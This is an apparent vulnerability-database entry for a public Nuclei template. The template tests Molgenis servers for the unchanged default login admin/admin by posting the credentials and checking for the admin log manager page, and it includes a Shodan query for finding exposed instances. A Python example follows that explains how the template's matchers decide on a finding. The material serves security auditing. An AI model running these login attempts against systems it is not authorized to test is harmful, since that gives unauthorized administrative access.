molgenis-default-login: Molgenis - Default Login

Date: 2025-08-01 | Affected software: molgenis | PoC: public

Vulnerability description

Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials.

PoC code [public]

id: molgenis-default-login

info:
  name: Molgenis - Default Login
  author: ritikchaddha
  severity: high
  description: |
    Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials.
  reference:
    - https://molgenis.org/
    - https://github.com/molgenis/molgenis-emx2
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MOLGENIS"
  tags: molgenis,default-login,exposure,vuln

variables:
  username: 'admin'
  password: 'admin'

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        GET /menu/admin/logmanager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "Set-Cookie: JSESSIONID="

      - type: word
        part: body_2
        words:
          - "Sign out</button>"
          - "Log manager</a>"
        condition: and
# digest: 4a0a004730450220027c1733dd7de1ea7aaeac187608079fecb6d97d9757b0b57fd55469dd9633bf022100a2d69ee3ed391f8cacedfa799df9d39c64616e9a95d64bce11277035e2461668:922c64590222798bb761d5b6d8e72950
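To make explicit what the template above actually requires before it reports a finding (a session cookie on the login response AND both strings on the admin page, because the second matcher uses `condition: and` and the top level uses `matchers-condition: and`), here is a small evaluator of its two word matchers run against constructed HTTP responses. It is an added example, not code from the template author or the Molgenis project; the response strings and the `MATCHERS` table are constructed from the template text.

```python
# Added example: minimal evaluator for the two 'word' matchers in the
# molgenis-default-login template. Not part of nuclei or Molgenis; the
# responses below are constructed to illustrate the matcher semantics.

MATCHERS = [
    # part header_1: headers of the response to the first (POST /login) request
    {"part": "header_1", "words": ["Set-Cookie: JSESSIONID="]},
    # part body_2: body of the response to the second (GET /menu/admin/logmanager) request
    {"part": "body_2", "words": ["Sign out</button>", "Log manager</a>"], "condition": "and"},
]

def split_response(raw: str) -> tuple[str, str]:
    """Split a raw HTTP response into (headers, body) at the first blank line."""
    head, _, body = raw.partition("\r\n\r\n")
    return head, body

def word_matcher_hits(matcher: dict, responses: list[str]) -> bool:
    """Evaluate one nuclei-style 'word' matcher against the numbered responses.

    part is '<section>_<n>': section is header or body, n is the 1-based index
    of the request in the template's raw list. Without an explicit condition
    a single word hit is enough; 'condition: and' requires every word.
    """
    section, _, index = matcher["part"].partition("_")
    headers, body = split_response(responses[int(index) - 1])
    haystack = headers if section == "header" else body
    hits = [w in haystack for w in matcher["words"]]
    return all(hits) if matcher.get("condition", "or") == "and" else any(hits)

def template_matches(responses: list[str]) -> bool:
    """matchers-condition: and -> every matcher in the list must hit."""
    return all(word_matcher_hits(m, responses) for m in MATCHERS)

# Constructed responses (not captured from a real Molgenis instance).
LOGIN_OK = "HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=abc123; Path=/; HttpOnly\r\n\r\n"
LOGIN_REJECTED = "HTTP/1.1 401 Unauthorized\r\nContent-Type: text/html\r\n\r\nBad credentials"
ADMIN_PAGE = "HTTP/1.1 200 OK\r\n\r\n<a>Log manager</a> <button>Sign out</button>"
LOGIN_PAGE = "HTTP/1.1 200 OK\r\n\r\n<form>Sign in</form>"

if __name__ == "__main__":
    print(template_matches([LOGIN_OK, ADMIN_PAGE]))        # True
    print(template_matches([LOGIN_REJECTED, LOGIN_PAGE]))  # False
    # A session cookie alone does not satisfy the template: the protected
    # admin page must also render with both expected strings.
    print(template_matches([LOGIN_OK, LOGIN_PAGE]))        # False
```

The third case is the one worth noting when reviewing your own instance's results: a finding requires the log manager page to be served after the login, not merely a cookie being set.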